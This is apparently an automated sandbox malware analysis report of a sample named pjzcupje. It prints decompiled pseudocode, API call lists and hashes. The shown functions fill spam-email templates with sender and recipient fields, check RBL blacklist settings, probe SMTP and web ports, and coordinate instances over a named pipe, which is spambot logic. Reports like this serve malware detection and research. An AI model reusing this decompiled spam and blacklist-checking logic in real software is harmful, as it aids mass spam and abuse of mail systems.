0x004095d1, 0x004095db, 0x004095e7, 0x004095ed, 0x004095f3, 0x004095f9, 0x00409601, 0x00409601, 0x004095f9, 0x00000000, 0x004095db, 0x00000000, 0x00000000, 0x00000000

APIs
• GetVersionExA.KERNEL32(?,?,00409DD7,?,00000022,?,?,00000000,00000001), ref: 00409340
• GetModuleHandleA.KERNEL32(00000000,?,00000104,?,00409DD7,?,00000022,?,?,00000000,00000001), ref: 0040936E
• GetModuleFileNameA.KERNEL32(00000000,?,00409DD7,?,00000022,?,?,00000000,00000001), ref: 00409375
• wsprintfA.USER32 ref: 004093CE
• wsprintfA.USER32 ref: 0040940C
• wsprintfA.USER32 ref: 0040948D
• RegOpenKeyExA.ADVAPI32(80000002,00000000,?,?,00000000,00000101,?), ref: 004094F1
• RegQueryValueExA.ADVAPI32(?,00000000,?,00000000,?,?,?,?,?,00000000,00000101,?), ref: 00409526
• RegCloseKey.ADVAPI32(?,?,00000000,?,?,?,?,00000000,?,?,?,?,?,00000000,00000101,?), ref: 00409571
Strings
Memory Dump Source
• Source File: 0000000D.00000002.284660265.0000000000400000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_400000_pjzcupje.jbxd
Yara matches
Similarity
• API ID: wsprintf$Module$CloseFileHandleNameOpenQueryValueVersion
• String ID: runas
• API String ID: 3696105349-4000483414
• Opcode ID: ce0fe97b95b7462836751cff8a036d5e43cabe59bac28a8a36849dc161ab6571
• Instruction ID: 6752aeb10d98b7ea2ac03540c689f78e3d44a0922e5129ac444c5da45af1d8ff
• Opcode Fuzzy Hash: ce0fe97b95b7462836751cff8a036d5e43cabe59bac28a8a36849dc161ab6571
• Instruction Fuzzy Hash: 5EA181B2540208BBEB21DFA1CC45FDF3BACEB44744F104437FA05A2192D7B999848FA9
Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 96%
			E00402011() {
				long _t35;
				void* _t45;
				intOrPtr _t47;
				void* _t51;
				char* _t53;
				char* _t58;
				intOrPtr _t96;
				signed int _t102;
				signed int _t103;
				void* _t104;
				void* _t122;

				if(( *0x4122f4 & 0x00000001) == 0) {
					 *0x4122f4 =  *0x4122f4 | 0x00000001;
					 *0x4122f0 = E0040F04E(0);
				}
				if(( *0x4122f4 & 0x00000002) == 0) {
					 *0x4122f4 =  *0x4122f4 | 0x00000002;
					 *0x4122ec = E0040F04E(0);
				}
				if(( *0x4122f4 & 0x00000004) == 0) {
					 *0x4122f4 =  *0x4122f4 | 0x00000004;
					 *0x4122e8 = E0040F04E(0);
				}
				_t35 = GetTickCount();
				_t96 =  *((intOrPtr*)(_t104 + 0x114));
				if(_t35 -  *0x4122e0 > 0xdbba0) {
					_t58 =  *0x412000; // 0x410288
					_t103 = 0;
					if( *_t58 != 0) {
						_t60 = 0x412000;
						do {
							if(E00402684( *_t60) == 0) {
								goto L11;
							} else {
								 *(_t96 + 0x14) =  *(_t96 + 0x14) | 0x00000004;
								if(E00401978(_t61, 0x50) != 0) {
									_t12 = _t96 + 0x14;
									 *_t12 =  *(_t96 + 0x14) | 0x00000002;
									__eflags =  *_t12;
								} else {
									goto L11;
								}
							}
							goto L14;
							L11:
							_t103 = _t103 + 1;
							_t60 = 0x412000 + _t103 * 4;
						} while ( *((char*)( *(0x412000 + _t103 * 4))) != 0);
					}
					L14:
					 *0x4122e0 = GetTickCount();
				}
				if(GetTickCount() -  *0x4122dc > 0xdbba0) {
					_t53 =  *0x412000; // 0x410288
					_t102 = 0;
					if( *_t53 != 0) {
						_t55 = 0x412000;
						do {
							if(E00402EF8( *_t55) == 0) {
								goto L20;
							} else {
								 *(_t96 + 0x14) =  *(_t96 + 0x14) | 0x00000008;
								if(E00401978(_t56, 0x19) != 0) {
									_t18 = _t96 + 0x14;
									 *_t18 =  *(_t96 + 0x14) | 0x00000001;
									__eflags =  *_t18;
								} else {
                                                                                                                                  									goto L20;
                                                                                                                                  								}
                                                                                                                                  							}
                                                                                                                                  							goto L23;
                                                                                                                                  							L20:
                                                                                                                                  							_t102 = _t102 + 1;
                                                                                                                                  							_t55 = 0x412000 + _t102 * 4;
                                                                                                                                  						} while ( *((char*)( *(0x412000 + _t102 * 4))) != 0);
                                                                                                                                  					}
                                                                                                                                  					L23:
                                                                                                                                  					 *0x4122dc = GetTickCount();
                                                                                                                                  				}
                                                                                                                                  				 *(_t96 + 0x28) = GetTickCount() / 0x3e8;
                                                                                                                                  				 *((intOrPtr*)(_t96 + 0x2c)) = GetTickCount() / 0x3e8 -  *0x412110;
                                                                                                                                  				_t45 = E0040F04E(0) -  *0x4122f0;
                                                                                                                                  				_t93 = "localcfg";
                                                                                                                                  				_t122 = _t45 -  *0x4122e4; // 0x0
                                                                                                                                  				if(_t122 > 0) {
                                                                                                                                  					E0040E854(1, "localcfg", "rbl_bl", _t104 + 0x18, 0x100, 0x410264);
                                                                                                                                  					_t51 = E0040E819(1, _t93, "rbl_ip", 0);
                                                                                                                                  					_t104 = _t104 + 0x28;
                                                                                                                                  					if(_t51 == 0) {
                                                                                                                                  						L28:
                                                                                                                                  						 *0x4122e4 = 0x12c;
                                                                                                                                  					} else {
                                                                                                                                  						_t124 =  *((intOrPtr*)(_t104 + 0x10));
                                                                                                                                  						if( *((intOrPtr*)(_t104 + 0x10)) == 0) {
                                                                                                                                  							goto L28;
                                                                                                                                  						} else {
                                                                                                                                  							_push(_t104 + 0x10);
                                                                                                                                  							_push(_t51);
                                                                                                                                  							 *((intOrPtr*)(_t96 + 0x38)) = E00401C5F(_t124);
                                                                                                                                  							 *0x4122e4 = 0x4b0;
                                                                                                                                  						}
                                                                                                                                  					}
                                                                                                                                  				}
                                                                                                                                  				_t47 = E0040F04E(0) -  *0x4122f0;
                                                                                                                                  				if(_t47 > 0x4b0) {
                                                                                                                                  					E0040EA84(1, _t93, "net_type",  *(_t96 + 0x14));
                                                                                                                                  					_t47 = E0040F04E(0);
                                                                                                                                  					 *0x4122f0 = _t47;
                                                                                                                                  				}
                                                                                                                                  				return _t47;
                                                                                                                                  			}

                                                                                                                                  APIs
                                                                                                                                  • GetTickCount.KERNEL32 ref: 00402078
                                                                                                                                  • GetTickCount.KERNEL32 ref: 004020D4
                                                                                                                                  • GetTickCount.KERNEL32 ref: 004020DB
                                                                                                                                  • GetTickCount.KERNEL32 ref: 0040212B
                                                                                                                                  • GetTickCount.KERNEL32 ref: 00402132
                                                                                                                                  • GetTickCount.KERNEL32 ref: 00402142
                                                                                                                                    • Part of subcall function 0040F04E: SystemTimeToFileTime.KERNEL32(?,00000000,?,?,?,0040E342,00000000,745CF210,80000001,00000000,0040E513,?,00000000,00000000,?,000000E4), ref: 0040F089
                                                                                                                                    • Part of subcall function 0040F04E: GetSystemTimeAsFileTime.KERNEL32(80000001,?,?,?,0040E342,00000000,745CF210,80000001,00000000,0040E513,?,00000000,00000000,?,000000E4,000000C8), ref: 0040F093
                                                                                                                                    • Part of subcall function 0040E854: lstrcpyA.KERNEL32(00000001,?,?,0040D8DF,00000001,localcfg,except_info,00100000,00410264), ref: 0040E88B
                                                                                                                                    • Part of subcall function 0040E854: lstrlenA.KERNEL32(00000001,?,0040D8DF,00000001,localcfg,except_info,00100000,00410264), ref: 0040E899
                                                                                                                                    • Part of subcall function 00401C5F: wsprintfA.USER32 ref: 00401CE1
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000D.00000002.284660265.0000000000400000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_13_2_400000_pjzcupje.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: CountTick$Time$FileSystem$lstrcpylstrlenwsprintf
                                                                                                                                  • String ID: 0 v$localcfg$net_type$rbl_bl$rbl_ip
                                                                                                                                  • API String ID: 3976553417-1551482228
                                                                                                                                  • Opcode ID: e666061d80d691fc6b112011ec25e37af1bccbb964f924a1abaaf546849d61ae
                                                                                                                                  • Instruction ID: 2c4ade229706ff5e66d1d9a19171a9bb61e55472092035c31cb102c4d2320628
                                                                                                                                  • Opcode Fuzzy Hash: e666061d80d691fc6b112011ec25e37af1bccbb964f924a1abaaf546849d61ae
                                                                                                                                  • Instruction Fuzzy Hash: CF51F3706043465ED728EB21EF49B9A3BD4BB04318F10447FE605E62E2DBFC9494CA1D
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  C-Code - Quality: 78%
                                                                                                                                  			E0040B3C5(void* __eflags, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
                                                                                                                                  				char _v132;
                                                                                                                                  				void* _t46;
                                                                                                                                  				char* _t71;
                                                                                                                                  				intOrPtr _t72;
                                                                                                                                  				intOrPtr _t73;
                                                                                                                                  				intOrPtr _t75;
                                                                                                                                  				void* _t76;
                                                                                                                                  				void* _t77;
                                                                                                                                  
                                                                                                                                  				E00405CE1(_a4, 0x3e800, _a16, 0, 0);
                                                                                                                                  				E0040EF00( &_v132, "%FROM_EMAIL");
                                                                                                                                  				E00405CE1( &_v132, 0x64, _a16, 0, 0);
                                                                                                                                  				_t71 = E0040ED03( &_v132, 0x40);
                                                                                                                                  				_t77 = _t76 + 0x38;
                                                                                                                                  				_t83 = _t71;
                                                                                                                                  				if(_t71 != 0) {
                                                                                                                                  					_t7 = _t71 + 1; // 0x1
                                                                                                                                  					E0040EF7C(_t83, _a4, "%FROM_DOMAIN", _t7, 0x3e800, 0);
                                                                                                                                  					 *_t71 = 0;
                                                                                                                                  					E0040EF7C(_t83, _a4, "%FROM_USER",  &_v132, 0x3e800, 0);
                                                                                                                                  					_t77 = _t77 + 0x28;
                                                                                                                                  				}
                                                                                                                                  				_t72 = _a12;
                                                                                                                                  				E0040EF7C(_t83, _a4, "%TO_DOMAIN",  *((intOrPtr*)(_t72 + 0xc)), 0x3e800, 0);
                                                                                                                                  				wsprintfA( &_v132, "%s@%s",  *((intOrPtr*)(_t72 + 8)),  *((intOrPtr*)(_t72 + 0xc)));
                                                                                                                                  				E0040EF7C(_t83, _a4, "%TO_EMAIL",  &_v132, 0x3e800, 0);
                                                                                                                                  				_t73 = _a4;
                                                                                                                                  				E0040EF7C(_t83, _t73, "%TO_USER",  *((intOrPtr*)(_t72 + 4)), 0x3e800, 0);
                                                                                                                                  				_t46 = E0040F0CB( &_v132);
                                                                                                                                  				_push(0);
                                                                                                                                  				_push( &_v132);
                                                                                                                                  				_push(_t46);
                                                                                                                                  				E0040F133();
                                                                                                                                  				E0040EF7C(_t83, _t73, "%TO_HASH",  &_v132, 0x3e800, 0);
                                                                                                                                  				_push(_t73);
                                                                                                                                  				E0040AD89( &_v132, _t83);
                                                                                                                                  				E0040B211(0,  &_v132, 0);
                                                                                                                                  				E0040EF7C(_t83, _t73, "%DATE",  &_v132, 0x3e800, 0);
                                                                                                                                  				E0040B211(0,  &_v132, 5);
                                                                                                                                  				E0040EF7C(_t83, _t73, "%P5DATE",  &_v132, 0x3e800, 0);
                                                                                                                                  				E0040B211(0,  &_v132, 0xfffffffb);
                                                                                                                                  				E0040EF7C(_t83, _t73, "%M5DATE",  &_v132, 0x3e800, 0);
                                                                                                                                  				_t75 = _a8;
                                                                                                                                  				 *((char*)(E0040AEDD(_t75, _t73, 0x3e800) + _t75)) = 0;
                                                                                                                                  				return _t75;
                                                                                                                                  			}

Instruction addresses: 0x0040b3e1 0x0040b3ef 0x0040b3ff 0x0040b40f 0x0040b411 0x0040b414 0x0040b416 0x0040b41a 0x0040b426 0x0040b439 0x0040b43b 0x0040b440 0x0040b440 0x0040b443 0x0040b453 0x0040b467 0x0040b47b 0x0040b485 0x0040b48e 0x0040b49a 0x0040b49f 0x0040b4a3 0x0040b4a4 0x0040b4a5 0x0040b4b6 0x0040b4bb 0x0040b4bc 0x0040b4c7 0x0040b4d8 0x0040b4e7 0x0040b4f8 0x0040b504 0x0040b515 0x0040b51e 0x0040b52b 0x0040b534

                                                                                                                                  APIs
                                                                                                                                  • wsprintfA.USER32 ref: 0040B467
                                                                                                                                    • Part of subcall function 0040EF7C: lstrlenA.KERNEL32(-00000010,00000000,00000080,-00000004,-00000010), ref: 0040EF92
                                                                                                                                    • Part of subcall function 0040EF7C: lstrlenA.KERNEL32(?), ref: 0040EF99
                                                                                                                                    • Part of subcall function 0040EF7C: lstrlenA.KERNEL32(00000000), ref: 0040EFA0
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000D.00000002.284660265.0000000000400000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_13_2_400000_pjzcupje.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: lstrlen$wsprintf
                                                                                                                                  • String ID: %DATE$%FROM_DOMAIN$%FROM_EMAIL$%FROM_USER$%M5DATE$%P5DATE$%TO_DOMAIN$%TO_EMAIL$%TO_HASH$%TO_USER$%s@%s
                                                                                                                                  • API String ID: 1220175532-2340906255
                                                                                                                                  • Opcode ID: f116c43b1eb536776b1bff8e0c8cac67a078ec341982f46d28ec492e3a392109
                                                                                                                                  • Instruction ID: bf34ba3998127a8345ca8177a6a798a4e2b1dcf0281bd89f40bace4b7f612c60
                                                                                                                                  • Opcode Fuzzy Hash: f116c43b1eb536776b1bff8e0c8cac67a078ec341982f46d28ec492e3a392109
                                                                                                                                  • Instruction Fuzzy Hash: CE4174B254011D7EDF016B96CCC2DFFBB6CEF4934CB14052AF904B2181EB78A96487A9
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  C-Code - Quality: 92%
                                                                                                                                  			E0040C2DC(void* __ebp, signed int _a4) {
                                                                                                                                  				void* _t86;
                                                                                                                                  				signed int _t90;
                                                                                                                                  				signed int _t91;
                                                                                                                                  				long _t93;
                                                                                                                                  				signed int _t95;
                                                                                                                                  				signed int _t101;
                                                                                                                                  				signed int _t108;
                                                                                                                                  				signed int _t112;
                                                                                                                                  				signed int _t115;
                                                                                                                                  				long _t117;
                                                                                                                                  				long _t118;
                                                                                                                                  				signed int _t120;
                                                                                                                                  				struct _SECURITY_ATTRIBUTES* _t122;
                                                                                                                                  				signed int _t123;
                                                                                                                                  				signed int _t132;
                                                                                                                                  				signed int _t148;
                                                                                                                                  				signed char _t151;
                                                                                                                                  				signed int _t154;
                                                                                                                                  				signed int _t156;
                                                                                                                                  				signed char* _t157;
                                                                                                                                  				void* _t158;
                                                                                                                                  				signed int _t163;
                                                                                                                                  
                                                                                                                                  				_t158 = __ebp;
                                                                                                                                  				_t157 = _a4;
                                                                                                                                  				E0040A4C7(_t157);
                                                                                                                                  				_t122 = 0;
                                                                                                                                  				if(_t157[0x44] == 0) {
                                                                                                                                  					_t157[8] = 0;
                                                                                                                                  					_t157[0x34] = 0;
                                                                                                                                  					_t157[0x38] = 0;
                                                                                                                                  					_t157[0x3c] = 0;
                                                                                                                                  					_t157[0x54] = 0;
                                                                                                                                  					_t157[0x40] = 0;
                                                                                                                                  					_t157[0x58] = 0;
                                                                                                                                  					L31:
                                                                                                                                  					_t82 =  &(_t157[4]); // 0x40c4e4
                                                                                                                                  					_t86 = _t82;
                                                                                                                                  					_t148 =  !( *_t157) & 0x00000001;
                                                                                                                                  					_t157[0x5c] = _t122;
                                                                                                                                  					_t84 =  &(_t157[8]); // 0xfffffdf0
                                                                                                                                  					if( *_t86 >=  *_t84) {
                                                                                                                                  						L34:
                                                                                                                                  						return _t86;
                                                                                                                                  					}
                                                                                                                                  					_t86 = CreateThread(_t122, _t122, E0040B535, InterlockedIncrement(_t86) | _t148 << 0x00000010, _t122, _t122);
                                                                                                                                  					if(_t86 == _t122) {
                                                                                                                                  						goto L34;
                                                                                                                                  					}
                                                                                                                                  					return CloseHandle(_t86);
                                                                                                                                  				}
                                                                                                                                  				if(_t157[8] != 0) {
                                                                                                                                  					__eflags = _t157[0x48];
                                                                                                                                  					if(_t157[0x48] == 0) {
                                                                                                                                  						L5:
                                                                                                                                  						_t12 =  &(_t157[0x10]); // 0x59be026a
                                                                                                                                  						_t90 =  *_t12;
                                                                                                                                  						_t157[8] = _t90;
                                                                                                                                  						_t157[0x34] = _t90;
                                                                                                                                  						_t91 = _t90 * 0x3e8;
                                                                                                                                  						__eflags = _t91;
                                                                                                                                  						_t157[0x38] = _t122;
                                                                                                                                  						_t157[0x3c] = _t122;
                                                                                                                                  						_t157[0x1c] = _t90 * 0x2710;
                                                                                                                                  						_t157[0x20] = _t91;
                                                                                                                                  						goto L6;
                                                                                                                                  					}
                                                                                                                                  					_t118 = GetTickCount();
                                                                                                                                  					_t11 =  &(_t157[0x48]); // 0x13740041
                                                                                                                                  					__eflags = _t118 -  *_t11 - 0x927c0;
                                                                                                                                  					if(_t118 -  *_t11 < 0x927c0) {
                                                                                                                                  						goto L6;
                                                                                                                                  					}
                                                                                                                                  					goto L5;
                                                                                                                                  				} else {
                                                                                                                                  					_t4 =  &(_t157[0xc]); // 0x5756c359
                                                                                                                                  					_t120 =  *_t4;
                                                                                                                                  					_t157[0x1c] = _t120 * 0x2710;
                                                                                                                                  					_t157[8] = _t120;
                                                                                                                                  					_t157[0x20] = _t120 * 0x3e8;
                                                                                                                                  					_t157[0x34] = _t120;
                                                                                                                                  					_t157[0x48] = GetTickCount();
                                                                                                                                  					L6:
                                                                                                                                  					if(( *_t157 & 0x00000001) == 0) {
                                                                                                                                  						_t73 =  &(_t157[0x34]); // 0xa1c35e5f
                                                                                                                                  						_t157[8] =  *_t73;
                                                                                                                                  						goto L31;
                                                                                                                                  					}
                                                                                                                                  					_t93 = GetTickCount();
                                                                                                                                  					_t21 =  &(_t157[0x4c]); // 0x26fce850
                                                                                                                                  					if(_t93 -  *_t21 >= 0x2710) {
                                                                                                                                  						goto L31;
                                                                                                                                  					}
                                                                                                                                  					if(_t157[0x54] == _t122) {
                                                                                                                                  						_t95 = 0x3e8;
                                                                                                                                  					} else {
                                                                                                                                  						_t117 = GetTickCount();
                                                                                                                                  						_t23 =  &(_t157[0x54]); // 0x41366c1d
                                                                                                                                  						_t95 = _t117 -  *_t23;
                                                                                                                                  					}
                                                                                                                                  					_t123 = _t95;
                                                                                                                                  					if(_t95 < 1) {
                                                                                                                                  						_t123 = 1;
                                                                                                                                  					}
                                                                                                                                  					if(_t123 > 0x4e20) {
                                                                                                                                  						_t123 = 0x4e20;
                                                                                                                                  					}
                                                                                                                                  					_t24 =  &(_t157[0x58]); // 0x701d8900
		_t25 =  &(_t157[0x40]); // 0x74c33b57
		_t151 =  *_t25;
		_t132 =  *_t24 * 0x3e8;
		_push(_t158);
		asm("cdq");
		_push(0x14);
		_a4 = _t123;
		asm("cdq");
		_t101 = (_t132 - _t151) * _t123 / 0x3e8 / 0x3e8;
		if(_t101 == 0) {
			__eflags = _t132 - _t151;
			if(__eflags == 0) {
				goto L22;
			}
			if(__eflags >= 0) {
				_t156 = _t151 + 1;
				__eflags = _t156;
			} else {
				_t156 = _t151 - 1;
			}
			goto L21;
		} else {
			_t156 = _t151 + _t101;
			L21:
			_t157[0x40] = _t156;
			L22:
			if(_t157[0x40] < 0) {
				_t157[0x40] = _t157[0x40] & 0x00000000;
			}
			_t39 =  &(_t157[0x40]); // 0x74c33b57
			_t163 = (0xc8 -  *_t39) * 0x14;
			if(_t123 > 0x3e8) {
				_a4 = 0x3e8;
			}
			asm("cdq");
			_t46 =  &(_t157[0x14]); // 0x5f004120
			_t47 =  &(_t157[0x10]); // 0x59be026a
			asm("cdq");
			_t49 =  &(_t157[0x30]); // 0xe4754f45
			_t54 =  &(_t157[0x20]); // 0x406a0000
			_t108 = E0040A505(_t163 * _a4 / 0x3e8 /  *_t49 +  *_t54,  *_t47 * 0x3e8,  *_t46 * 0x3e8);
			asm("cdq");
			_t56 =  &(_t157[0x2c]); // 0xc68314c4
			_t157[0x20] = _t108;
			_t112 = E0040A505(_t163 /  *_t56 + _t108,  *_t47 * 0x3e8,  *_t46 * 0x3e8);
			asm("cdq");
			_t122 = 0;
			_t157[0x58] = 0;
			_t154 = _t112 / 0x3e8;
			_t157[0x54] = GetTickCount();
			_t68 =  &(_t157[0x34]); // 0xa1c35e5f
			_t115 =  *_t68;
			if(_t115 <= _t154) {
				_t157[8] = _t115;
				_t157[0x20] = _t115 * 0x3e8;
			} else {
				_t157[8] = _t154;
				_t157[0x1c] = _t154 * 0x2710;
			}
			goto L31;
		}
	}
}


APIs
  • Part of subcall function 0040A4C7: GetTickCount.KERNEL32 ref: 0040A4D1
  • Part of subcall function 0040A4C7: InterlockedExchange.KERNEL32(?,00000001), ref: 0040A4FA
• GetTickCount.KERNEL32 ref: 0040C31F
• GetTickCount.KERNEL32 ref: 0040C32B
• GetTickCount.KERNEL32 ref: 0040C363
• GetTickCount.KERNEL32 ref: 0040C378
• GetTickCount.KERNEL32 ref: 0040C44D
• InterlockedIncrement.KERNEL32(0040C4E4), ref: 0040C4AE
• CreateThread.KERNEL32 ref: 0040C4C1
• CloseHandle.KERNEL32(00000000,?,0040C4E0,00413588,00408810), ref: 0040C4CC
Strings
Memory Dump Source
• Source File: 0000000D.00000002.284660265.0000000000400000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_400000_pjzcupje.jbxd
Yara matches
Similarity
• API ID: CountTick$Interlocked$CloseCreateExchangeHandleIncrementThread
• String ID: 0 v$localcfg
• API String ID: 1553760989-2166502722
• Opcode ID: afac293e63498dd1283f128a7be93ce9089d2193a9ff6ee31ee25d998cb0b475
• Instruction ID: d79c9f10581ee3273b6165e92ba068ddd4f199cf4cd09fd02743c11af2233124
• Opcode Fuzzy Hash: afac293e63498dd1283f128a7be93ce9089d2193a9ff6ee31ee25d998cb0b475
• Instruction Fuzzy Hash: 0E515CB1A00B41CFC7249F6AC5D552ABBE9FB48304B509A3FE58BD7A90D778F8448B14
Uniqueness

Uniqueness Score: -1.00%

APIs
• htons.WS2_32(0040CA1D), ref: 0040F34D
• socket.WS2_32(00000002,00000001,00000000), ref: 0040F367
• closesocket.WS2_32(00000000), ref: 0040F375
Strings
Memory Dump Source
                                                                                                                                  • Source File: 0000000D.00000002.284660265.0000000000400000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_13_2_400000_pjzcupje.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: closesockethtonssocket
                                                                                                                                  • String ID: time_cfg
                                                                                                                                  • API String ID: 311057483-2401304539
                                                                                                                                  • Opcode ID: 2a826acfe3cae001ba33e046207a1606f0b733d4175eb994d9abd389a0737888
                                                                                                                                  • Instruction ID: 30084693e0db7c5d018f03cf39b97fa82366a7d059792586ebb4172a1a3c68ff
                                                                                                                                  • Opcode Fuzzy Hash: 2a826acfe3cae001ba33e046207a1606f0b733d4175eb994d9abd389a0737888
                                                                                                                                  • Instruction Fuzzy Hash: AA319E72900118ABDB20DFA5DC859EF7BBCEF88314F104176F904E3190E7788A858BA9
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

C-Code - Quality: 98%
E0040405E(void* __ecx) {
	unsigned int _v8;
	unsigned int _v12;
	void* _v16;
	void* _v20;
	intOrPtr _v24;
	char _v28;
	intOrPtr _v32;
	char _v40;
	void* _t40;
	void* _t43;
	void* _t49;
	void* _t56;
	void* _t62;
	void* _t64;
	long _t71;
	void* _t82;
	void* _t92;
	void* _t93;
	void* _t95;
	void* _t97;
	void* _t98;
	void* _t99;
	void* _t103;
	void* _t104;

	_t95 = __ecx;
	_v8 = 0;
	_t40 = CreateEventA(0, 1, 1, 0);
	_v16 = _t40;
	if(_t40 != 0) {
		_t43 = E00404000(E00403ECD(_t95),  &_v20);
		_t97 = _t98;
		_t102 = 0x7d0;
		_t92 = 0x100;
		_t99 = 0x4122f8;
		if(_t43 == 0) {
			L10:
			E0040EE2A(_t97, _t99, 0, _t92);
			_t104 = _t103 + 0xc;
			_t93 = 0xa;
			while(1) {
				_t93 = _t93 - 1;
				_t99 = CreateNamedPipeA(E00403ECD(_t97), 0x40000003, 0, 0xff, 0x64, 0x64, 0x64, 0);
				if(_t99 != 0xffffffff) {
					break;
				}
				Sleep(0x1f4);
				if(_t93 != 0) {
					continue;
				}
				CloseHandle(_v16);
				return 0;
			}
			L14:
			while(1) {
				do {
					L14:
					while(1) {
						do {
							if(ConnectNamedPipe(_t99, 0) != 0) {
								goto L16;
							}
							_t71 = GetLastError();
							asm("sbb eax, eax");
							if( ~(_t71 - 0x217) + 1 == 0) {
								L25:
								DisconnectNamedPipe(_t99);
								continue;
							}
							L16:
							_t49 = E00403F8C(_t99,  &_v12, 4, _v16, _t102);
							_t104 = _t104 + 0x14;
						} while (_t49 == 0);
						_t92 = _v16;
						_v8 = (_v12 >> 2) + _v12;
						E00403F18(_t99,  &_v8, 4, _t92, _t102);
						_t56 = E00403F8C(_t99,  &_v12, 4, _t92, _t102);
						_t104 = _t104 + 0x28;
						if(_t56 == 0 || _v12 != (_v8 >> 2) + _v8) {
							goto L25;
						} else {
							_t62 = E00403F8C(_t99,  &_v28, 8, _t92, _t102);
							_t104 = _t104 + 0x14;
							if(_t62 == 0 || _v24 != 0xc) {
								goto L25;
							} else {
								_t64 = E00403F8C(_t99,  &_v40, 0xc, _t92, _t102);
								_t104 = _t104 + 0x14;
								if(_t64 == 0) {
									goto L25;
								}
								break;
							}
						}
					}
				} while (_v28 != 1);
				E00403F18(_t99,  &_v8, 4, _t92, _t102);
				_t103 = _t104 + 0x14;
				if(_v32 == 0) {
					_t102 = CloseHandle;
					CloseHandle(_t99);
					CloseHandle(_t92);
					E0040E318();
					L8:
					ExitProcess(0);
				}
				 *0x41215a =  *0x41215a + 1;
			}
		}
		E0040EE2A(_t97, 0x4122f8, 0, 0x100);
		_t103 = _t103 + 0xc;
		if(_v20 == 0xffffffff) {
			goto L10;
		}
		_v12 = E0040ECA5();
		E00403F18(_v20,  &_v12, 4, _v16, 0x7d0);
		_t82 = E00403F8C(_v20,  &_v8, 4, _v16, 0x7d0);
		_t103 = _t103 + 0x28;
		if(_t82 == 0 || _v8 != (_v12 >> 2) + _v12) {
			CloseHandle(_v20);
			goto L10;
		} else {
			_v8 = _v8 + (_v8 >> 2);
			E00403F18(_v20,  &_v8, 4, _v16, 0x7d0);
			_t103 = _t103 + 0x14;
			goto L8;
		}
	}
	return 0;
}

                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x00404230
                                                                                                                                  0x00404215
                                                                                                                                  0x004041f2
                                                                                                                                  0x00404232
                                                                                                                                  0x00404245
                                                                                                                                  0x0040424a
                                                                                                                                  0x00404251
                                                                                                                                  0x0040426a
                                                                                                                                  0x00404271
                                                                                                                                  0x00404274
                                                                                                                                  0x00404276
                                                                                                                                  0x0040411f
                                                                                                                                  0x00404121
                                                                                                                                  0x00404121
                                                                                                                                  0x00404253
                                                                                                                                  0x00404253
                                                                                                                                  0x00404188
                                                                                                                                  0x004040b2
                                                                                                                                  0x004040b7
                                                                                                                                  0x004040be
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x004040c9
                                                                                                                                  0x004040d5
                                                                                                                                  0x004040e7
                                                                                                                                  0x004040ec
                                                                                                                                  0x004040f1
                                                                                                                                  0x0040412a
                                                                                                                                  0x00000000
                                                                                                                                  0x00404101
                                                                                                                                  0x0040410b
                                                                                                                                  0x00404117
                                                                                                                                  0x0040411c
                                                                                                                                  0x00000000
                                                                                                                                  0x0040411c
                                                                                                                                  0x004040f1
                                                                                                                                  0x00000000

                                                                                                                                  APIs
                                                                                                                                  • CreateEventA.KERNEL32(00000000,00000001,00000001,00000000), ref: 00404070
                                                                                                                                  • ExitProcess.KERNEL32 ref: 00404121
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000D.00000002.284660265.0000000000400000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_13_2_400000_pjzcupje.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: CreateEventExitProcess
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 2404124870-0
                                                                                                                                  • Opcode ID: a7245d695b6c108c1b2c14e57ed76f02bf9552f3b235e99bac8c66b9f90f9768
                                                                                                                                  • Instruction ID: 074d9bb49edb1fcb374f0917b5464843becdd4ef2bd88426a03fabb40598a920
                                                                                                                                  • Opcode Fuzzy Hash: a7245d695b6c108c1b2c14e57ed76f02bf9552f3b235e99bac8c66b9f90f9768
                                                                                                                                  • Instruction Fuzzy Hash: 3C5192B1E00209BAEB10ABA19D45FFF7A7CEB54755F00007AFB04B61C1E7798A41C7A9
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  APIs
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000D.00000002.284699476.0000000000415000.00000020.00000001.01000000.00000004.sdmp, Offset: 00415000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_13_2_415000_pjzcupje.jbxd
                                                                                                                                  Similarity
